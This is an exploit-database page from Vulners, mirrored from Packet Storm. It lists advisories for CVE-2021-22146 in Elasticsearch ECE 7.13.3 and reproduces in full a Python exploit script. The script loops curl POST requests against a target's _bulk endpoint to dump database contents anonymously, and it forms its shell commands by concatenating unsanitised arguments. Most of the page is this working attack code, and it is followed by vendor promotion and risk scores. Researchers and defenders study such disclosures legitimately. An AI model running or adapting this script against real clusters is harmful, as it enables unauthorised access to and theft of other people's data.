Vulners
Lucene search
Elasticsearch ECE 7.13.3 Database Disclosure
🗓️ 26 Jul 2021 00:00:00Reported by Joan MartinezType 
packetstorm🔗 packetstormsecurity.com👁 908 Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Elasticsearch ECE 7.13.3 - Anonymous Database Dump Exploit | 26 Jul 202100:00 | – | zdt |
 | Exploit for CVE-2021-22146 | 22 Jul 202106:50 | – | githubexploit |
 | The vulnerability of the Elastic Cloud Enterprise analytics platform, related to security configuration errors, allows a perpetrator to gain access to protected information. | 10 Aug 202100:00 | – | bdu_fstec |
 | CVE-2021-22146 | 28 Jul 202111:01 | – | circl |
 | Elasticsearch 安全漏洞 | 21 Jul 202100:00 | – | cnnvd |
 | CVE-2021-22146 | 21 Jul 202111:28 | – | cve |
 | CVE-2021-22146 | 21 Jul 202111:28 | – | cvelist |
 | Elasticsearch ECE 7.13.3 - Anonymous Database Dump | 26 Jul 202100:00 | – | exploitdb |
 | Elastic Cloud Enterprise security update | 20 Jul 202115:17 | – | elastic |
 | CVE-2021-22146 | 21 Jul 202115:15 | – | nvd |
10
`# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <= 7.13.3
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180
import os
import argparse
import sys
######### Check Arguments
def checkArgs():
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
parser.add_argument('-s', "--host", action="store",
dest='host',
help="Host to attack.")
parser.add_argument('-p', "--port", action="store",
dest='port',
help="Elastic search port by default 9200 or 9201")
parser.add_argument('-i', "--index", action="store",
dest='index',
help="Index to dump (Example: 30)")
args = parser.parse_args()
if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) :
parser.print_help(sys.stderr)
sys.exit(1)
return args
def banner():
print(" _ _ _ _")
print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __")
print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")
print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")
print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")
print(" |_|")
def exploit(host,port,index):
if (index != 0):
final = int(index)
else:
final = 1000000000
cont = 0
while (cont <= final):
os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
cont = cont + 1
if __name__ == "__main__":
banner()
args = checkArgs()
if (args.index):
exploit(args.host,args.port,args.index)
else:
exploit(args.host,args.port,0)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jul 2021 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.27788